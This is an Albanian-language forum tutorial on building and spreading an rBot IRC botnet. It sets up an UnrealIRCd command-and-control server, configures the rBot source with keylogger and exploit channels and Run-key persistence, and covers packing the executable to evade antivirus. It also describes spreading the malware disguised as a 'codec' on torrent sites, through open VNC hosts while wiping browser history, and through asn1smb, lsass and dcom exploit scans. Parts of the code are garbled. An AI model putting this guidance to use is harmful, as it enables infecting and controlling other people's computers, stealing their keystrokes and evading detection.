Pjeset e tutorialit:
1.Cka na nevojitet
2.Si ta konfigurojm nje (unreal)ircd
3.Si ti kompilojm botnetat
4.Krijo EXE tende
5.Menyra e perdorimit dhe perhapjes

1.Cka na nevojitet
Jan disa gjera qe nevojiten per krijimin e botnetit.Un jam duke krijuar listen me gjerat qe nevojiten edhe do te ju shpjegoj pse ato nevojiten.

Visual Studio 6.0 [http://rapidshare.com/users/2HVXW5 | password: bb.bearslinks.info]
Visual Studio 6 Service Pack 5 [http://download.microsoft.com/downlo...US/vs6sp5.exe]
Visual Studio 6.0 Processor Pack [http://download.microsoft.com/downlo...-us/vcpp5.exe]
Core SDK [http://www.microsoft.com/msdownload/...psdk-full.htm]

Per instalim te ketyre aplikacioneve mundeni te shkoni mbas tutorialit me posht:
http://www.ryan1918.com/viewtopic.php?t=1509

-windows box i rotum(mundet edhe ne linux,por jam duke treguar per windows)
-1 ircd (mund te gjehen edhe neper google)
-source i botnetave (une perdora rBot per shembull,ka sourca shum gjehen gjithkah)

2.Si te konfigurojm (unreal) ircd
Shumica e IRCD jan shum leht te konfigurohen,ne shumicen e rasteve ato te modifikuarat.Shumicen e hereve ne kemi te editojm emrin,authostin,ircd portin edhe passin & userin e adminit.Cka kemi te Editojm:

Kodi:
oper your-choosen-username { // Ketu shkruani emrin perdorues tuaj qe keni deshir te keni {
userhost "yourname@*"; // Ketu shkruani Email Adressen e juaj
};
password "your-choosen-pass"; // Ketu Shkruani passwordin qe keni deshir te perdorni
class "default";
flags {
netadmin;
services-admin;
global;
helpop;
can_rehash
can_globalnotice;
can_globalroute;
can_globops;
can_wallops;
can_unkline;
can_kline;
can_globalkill;
can_zline;
can_gkline;
can_gzline;
get_umodew;
get_host;
can_override;
can_die;
can_restart;
};
};Tash editoni flamujt ,nese keni deshir te beni me shum ircd perdorues veq copy paste ket kode:

Kodi:
me { name "QuakeNet"; info "QuakeNet"; numeric 1; };Ketu eshte tani emri serverit poashtu edhe ircd perdoruesit mvaren nga emri serverit,emri serverit mund te jet shembull: "irc.ulhg-crew.net" ose me IP
Tani porten ta konfigurojm:

Kodi:
listen *:6667;Leht editoni cdo port nga port qe eshte e hapur,prej portes 6500 deri ne 7000 jan te hapura zakonisht.

Do gjera extra per te edituar:

hosts {
local "QuakeNet";
global "QuakeNet";
coadmin "QuakeNet";
admin "QuakeNet";
servicesadmin "QuakeNet";
netadmin "QuakeNet";
host-on-oper-up "yes";
};
};

Neper vendet ku shkrun QuakeNet shkruani domainin e juve sikur emri serverit psh emri serverit "irc.shembull.com" aty ne QuakeNet shkruani "shembull" pa thojza..

Sethostat qe i merr nese je operator,duket kshtu g7onic@local.quakenet.org / g7onic@global.quakenet.org
Edhe ju menjiher shkruani "no" ne host-on-oper-up nese nuk keni deshir te selektoni hoste automatike (auto host)

Kodi:
restrict-channelmodes "ntsuom";
modes-on-join "+Mustm";Ne kodin me nelt editoni kanalet sipas sigurimit tuaj qe keni deshir,pastaj ruani fajllin e konfigurimit,dhe duhet ti shtini ne .rar dhe ti uploadoni ne folder te sigurum sikur C:\Windows\????.Pastaj veq qelne Exe e cila ju lejon te startoni IRCD serverin ose hapeni Batch File i cili ne shumicen e rasteve gjindet neper folderat e fajllave te IRCD...!Pasi qe e keni ber ket nese cdo gje ka shkuar sikur mbas tutorialit tim ateher IRCD serveri juar ka startuar...Pra kryem edhe me ket pjes

3.Si ti kompilojm botnetat
Un e mora kompilimin e rBot,botnetit i cili eshte shum i mir per te filluar me te,me te kam fillu para se te kompiloj skenerat e botnetat tjer...Edhe rBot eshte botneti me i leht,un do te kopjoj dhe ta qes ne forum kompilin e ketij botneti.

Kodi:
// konfigurimi i botnetit (gjenerike) - sduhet te jet e enkriputar
int port = 6667;
int port2 = 6667;
int socks4port = 8001;
int tftpport = 69;
int httpport = 5465;
int rloginport = 514;
BOOL topiccmd = TRUE;
BOOL rndfilename = FALSE;
BOOL AutoStart = TRUE;
char prefix = '.';
int maxrand = 8;
int nicktype = CONSTNICK;
BOOL nickprefix = FALSE;

#ifdef DEBUG_LOGGING
char logfile[]="%temp%\\yas.jpg";
#endif

#ifndef NO_CRYPT // Ketu vetem perdor stringsat e enkriptum,sepse ndryshe binari juaj sdo te funksionoj!!

#else // Ju rekomandoj te perdorni per ket setup Crypt,sepse eshte e pa sigurt.

char botid[] = "rx-asn-2-re-worked";
char version[] = "v2 by ovelayer";
char password[] = "yourpass";
char server[] = "";
char serverpass[] = "";
char channel[] = "#";
char chanpass[] = "";rd
char server2[] = ""
char channel2[] = "#";
char chanpass2[] = "";
char filename[] = "yourfile.exe";
char keylogfile[] = "keylog.xml"l
char valuename[] = "";
char nickconst[] = "rBot|";
char szLocalPayloadFile[]="yourfile.exe";
char modeonconn[] = "-xi+B";
char exploitchan[] = "#*";
char keylogchan[] = "#*";
char psniffchan[] = "#*";

char *authost[] = {
"yournick@172.0.0.1"
};

char *versionlist[] = {
"mIRC v6.12 Khaled Mardam-Bey",
};

char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Ru n";
char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\Ru nServices";
char regkey3[]="Software\\Microsoft\\OLE";
char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";

#endif

#ifdef PLAIN_CRYPT
char key[16] = "39lwmmqopma24ik1"; // Ndrro ket,se nuk te duhet me..!
#endif1.Ndrro porten e IRCD,zakonisht eshte 6667,nese ke tjeter atehere ndrroje.
2.Tani ndrro prefiksin zakonisht keshtu eshte ".",por ajo pika eshte para komand se ciles doni te beni pra shkruani ket ".login passwordi juaj ketu"
3.Ketu ndrrone passwordin,passwordin per te hyr te botneti juaj ".login passwordi i botnetit"
4.Passwordin e Serverit,momentalisht nuk e keni nje por e editoni nelt ne konfig (char serverpass[] = ""; )
5.Pastaj IP/DNS e serverit ndrrone
6.Kanali Juaj,ndrrone kanalin tuaj ku kajn per te hyr botnetat
7.Passwordi kanalit tuaj per te qen me e siguruar (char chanpass2[] = ""; )
8.Lene server 2 te rBot,per shkak qe ajo gje nuk ben
9.Ndrro emrin e fajllit (filename) qe te mos jet ber killed nga perdoruesi shum leht
10.Fajlli ku ku kompjuterat lajn logsat brenda,nuk duhet kjo !!
11.Emri valutes,per shembull nese quhet valuta juaj nod32 ateher vjen = Nod32 AntiVirus ose dicka e ngjajshme
12.Nickconst eshte prefiksi para botnetit sikur rBot|12312312
13.Modet e konektimit,mund ti leni sic jan
14.Kanali Exploitave,nese doni ti perdoni me Exploita (biruca) ateher leni mesazh aty
15.PSNIFF nuk funksionon ne rBOT pra rrasja ksaj
16.Rreth auto-host,kerkon nikun e juaj edhe emrin e serverit psh nese niku im eshte son1x. dhe emri serverit irc.ulhg-crew.net i bjen te shkruaj "son1x.@ulhg-crew.net" pa thojza kuptohet
17.Leji tjerat si jan...

Nese keni pyetje,lirisht mund ta beni,por mendoj qe kjo ndihmon...

4.Krijo EXE tende
Para se te filloni ti perhapni para hapit te fundit dmth,ju duhet te beni .exe e juar ajo behet me paker,per te mos u gjetur nga nod32 & Karspersky ateher duhet te gjehet nje paker shum shum i mir,por paker te mir sot eshte shum zor te gjehet,pra e beni me 1 paker te thjesht per shkak qe shumica e PC sot nuk kan hic antivirus

5.Menyra Perdorimit & Perhapja
Ka shum menyra ta perdorimit per perhapje te EXE te juar,ka edhe me exploit,nese ne kompilim te botnetit keni vendosur exploit ateher perdorene nepermjet te komandave te exploit,ne rast qe keni deshir te beni perhapjen ne lidhje me "movie" ateher mundeni ta quani EXE e juar "codec" pa thojza dhe ta shtini neper weba Torrent,ose skanoni disa VNC edhe infektoni ato leht duke cel IE edhe EXE dhe duke perdorur (REMOVE HISTORY!)

Tani nese i ke me shum se 30 bota mund te fillosh perdorimin edhe perhapjen e saj,por si thash ma nelt ka edhe exploita te ndryshem per perdorim sic jan asn1smb, lsass, dcom edhe krejt exploitat standard.
Por ato nuk do te perhapin shpejt EXE,por ka ende disa qe bojn OK,pra Usage (perdorimi) ose komanda per me skanu me exploit eshte:
Kodi:
.advscan exploit <Threads> <seconds> <delay> ip range <flags (use -b-r)Pra i bjen kshtuh:
Kodi:
.advscan asn1smb 80 5 0 255.255.x.x -b -r